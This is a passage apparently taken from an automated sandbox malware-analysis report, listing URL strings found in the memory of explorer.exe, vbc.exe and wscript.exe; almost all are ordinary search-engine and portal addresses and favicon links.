Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp | String found in binary or memory: http://gmpg.org/xfn/11
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2195288606.0000000004F30000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389538314.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://wordpress.org
          Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
